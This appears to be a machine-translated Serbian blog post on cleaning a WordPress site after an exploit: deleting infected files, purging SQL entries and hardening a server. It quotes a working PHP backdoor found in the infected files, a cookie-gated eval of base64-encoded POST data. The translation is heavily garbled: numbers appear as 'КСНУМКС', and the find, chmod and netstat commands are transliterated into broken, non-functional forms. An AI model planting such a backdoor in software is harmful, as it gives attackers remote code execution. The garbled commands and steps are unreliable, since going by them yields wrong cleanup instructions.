Пре него што прочитате овај чланак, требало би да видите пост овде, Да разумемо нешто. :)
Пронашао сам га у неколико датотека на блогу на stealthsettings.цом, кодови слични онима у наставку, који су се појавили као резултат вируса са подвиг од WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
Ако је изнад о фајлу кмлрпц.пхп од поспан, На греп сервера, изгледа као доста ове врсте у изворним кодовима.
Чишћења заражених датотека:
Оооокккк ...
КСНУМКС. Најбоље решење, као што се то ради резерваИ очишћена база података за стергети датотеке WordPress (вп-цонфиг.пхп и датотеке које нису строго повезане са вп платформом можете задржати са сервера и отпремити оригиналне из верзије 2.5.1 (Овом приликом и направити упграде верзија :) вп) http://wordpress.org/download/ . Обришите укључујући и фајлови тема ако не верујете да су њихови пажљивом проверавању.
Чини се да су погођени и фајлове од тема које нису коришћене и раније на блогу и једноставно мењање тема, не решава проблем.
./андрееа/вп-цонтент/тхемес/default/индек.пхп:
КСНУМКС. Тражи и избришете све фајлове са:... * _нев.пхп, _олд.пхп *, * Јпгг, гифф *, * Пнгг и ВП-Инфо.ткт фајл, ако их има.
наћи. -име “* _нев.пхп”
наћи. -име “* _олд.пхп”
наћи. -име “* .јпгг”
наћи. -име “* _гифф”
наћи. -име “* _пнгг”
наћи. -име “вп-инфо.ткт”
КСНУМКС. у / Тмп , Сеарцх и обрисати као тмпИвбзТКСНУМКС
СКЛ чишћење :
КСНУМКС. Табела у табели вп_options Проверите и обришите линије: интернал_линкс_цацхе, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Све у вп_options, Иди на ацтиве_плугинс и брисање ако постоји плугин који завршава у једном од локала _нев.пхп *, * _олд.пхп, јпгг *, *.. гифф, *. пнгг или ако се сумња на другом локалу, проверите пажљиво.
КСНУМКС. У табели вп_усерс, Види да ли постоји корисник који није написао ништа у његовом праву, колона усер_ниценаме. Избришите овог корисника, али запамтите број у колони ИД. Овај корисник ће вероватно користити "WordPress”Ца усер_логин се ствара и појави се на КСНУМКС: КСНУМКС: КСНУМКС КСНУМКС-КСНУМКС-КСНУМКС.
КСНУМКС. Мергети у табелул вп_усермета и избрисати све линије које припадају ИД горе.
Након што извршите ово чишћење СКЛ-а, онемогућите и активирајте било који додатак. (у блогу -> Контролна табла -> Додаци)
Сецуре сервер:
КСНУМКС. Погледајте шта директоријуме и датотеке "писати"(chmod 777) и покушај да се стави а chmod који више неће дозволити њихово писање на било ком нивоу. (chmod 644, на пример)
Нађи. -Перм-КСНУМКС-Лс
КСНУМКС. Погледајте шта датотеке имају битну сет Суид или сгид . Ако не користите ове фајлове ставио на њих chmod 0 или деинсталирате пакет да садржи. Они су веома опасни, јер они извршавају привилегије "група"Или"корен"Не са нормалним корисничких привилегија да изврши тај фајл.
финд /-типе ф-Перм-КСНУМКС-Лс
финд /-типе ф-Перм-КСНУМКС-Лс
КСНУМКС. Проверите који портови су отворени и покушајте да затворите или обезбеди онима који се не користе.
нетстат-| греп-и слушати
Толико. Видим Неки блогови су забрањени de Google Search а други кажу "Добро их је урадио!!!" . Па, урадио бих то за њих... али шта кажете ако Гугл почне да забрањује сви сајтови формирање Је спам и пут тројанце (Тројан.Цлицкер.ХТМЛ) у колачићима?
1 мисао на „WordPress Експлоатација – Очистите вирусне датотеке, СКЛ и безбедност сервера. ”